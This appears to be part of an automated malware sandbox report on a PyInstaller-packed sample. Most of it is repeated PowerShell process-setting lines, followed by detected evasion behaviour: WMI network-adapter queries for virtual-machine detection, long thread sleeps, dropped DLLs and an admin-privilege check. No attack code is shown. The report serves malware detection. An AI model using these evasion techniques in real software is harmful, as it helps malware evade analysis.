              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3491Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4369Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2437
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 458
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5861
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1770
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5009
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 924
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3392
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2375
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1358
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3355
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 956
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17268
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep count: 3491 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 114 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 4369 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796Thread sleep count: 127 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 2437 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000s
